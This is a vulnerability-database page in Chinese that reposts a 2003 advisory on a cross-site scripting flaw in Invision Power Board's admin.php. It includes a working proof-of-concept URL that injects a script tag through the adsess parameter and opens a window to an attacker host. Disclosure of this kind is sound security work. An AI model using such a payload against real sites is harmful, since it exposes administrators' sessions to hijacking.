Invision Power Board (IP.Board) 1.0/1.1/1.2 – ‘admin.php’ Cross-Site Scripting

Invision Power Board (IP.Board) 1.0/1.1/1.2 – ‘admin.php’ Cross-Site Scripting

漏洞ID 1054083 漏洞类型
发布时间 2003-08-09 更新时间 2003-08-09
图片[1]-Invision Power Board (IP.Board) 1.0/1.1/1.2 – ‘admin.php’ Cross-Site Scripting-安全小百科CVE编号 N/A
图片[2]-Invision Power Board (IP.Board) 1.0/1.1/1.2 – ‘admin.php’ Cross-Site Scripting-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23001
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8381/info

Invision Power Board admin.php script reported prone to a cross-site scripting vulnerability.

The issue presents itself due to a lack of sufficient sanitization performed by functions in an Invision Power Board script on user-influenced URI parameters. It has been reported that a remote attacker may construct a malicious link to the affected script hosted on a remote site, and supply arbitrary HTML code as a value for a URI parameter. If this link is followed, the content of the URI parameter will be rendered in the browser of the user who followed the link.

http://www.example.com/admin.php?adsess='><script>window.open
(window.location.search.substring
(78));</script><http://www.attacker.com?BoyBear$$$From$$$BinaryVision

相关推荐: Qbik WinGate 3.0 – Registry

Qbik WinGate 3.0 – Registry 漏洞ID 1053384 漏洞类型 发布时间 1999-02-22 更新时间 1999-02-22 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Windows CVSS评分 N/A |漏洞来源…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享